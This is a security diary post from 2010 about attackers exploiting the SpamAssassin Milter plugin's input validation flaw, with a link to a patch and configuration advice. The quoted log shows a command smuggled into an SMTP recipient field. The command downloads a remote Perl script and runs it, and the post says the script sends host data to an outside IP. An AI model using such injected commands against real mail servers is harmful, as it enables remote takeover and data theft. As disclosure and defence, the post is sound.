phpbb and sql errors asp sqlserver odbc sql errors
click to see newsfeed

Newsfeed
(click to hide)

about this feed

Today´s Diary

If you have more information or corrections regarding our diary, please share.

Share |
Published: 2010-03-15,
Last Updated: 2010-03-15 14:07:20 UTC
by Adrien de Beaupre (Version: 2)
1 comment(s)

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt;perl p.txt:   smtp.target.com[10.11.17.18] : User unknown in local recipient
       table; from=<blue@attacker.com> to=<root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)

Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).

The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though.

Update: SecurityFocus BID 38578

Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code: http://savannah.nongnu.org/bugs/index.php?29136

Alternatively, don't use the -x option when running this plugin, as well do not run it as root.

Cheers,
Adrien de Beaupré
EWA-Canada.com

 

1 comment(s)

If you have more information or corrections regarding our diary, click here to contact us.

Diary Archive

DateAuthorTitle
2010-03-15Adrien de Beaupre Spamassassin Milter Plugin Remote Root Attack
2010-03-14Marcus Sachs DST Issue in Windows 7 Ultimate?
2010-03-13Marcus Sachs Evil Sports Sites
2010-03-11donald smith Cert write up on Skype IMBot Logic and Functionality.
2010-03-11donald smith Interesting SKYPE SPIM.
2010-03-10Rob VandenBrink What's My Firewall Telling Me? (Part 4)
2010-03-10Rob VandenBrink Microsoft Security Advisory 981374 - Remote Code Execution Vulnerability for IE6 and IE7
2010-03-09John Bambenek Vodafone Android Phone: Complete with Mariposa Malware
2010-03-09John Bambenek March 2010 - Microsoft Patch Tuesday Diary
2010-03-09Marcus Sachs Energizer Malware
Complete Archive
Search Diaries: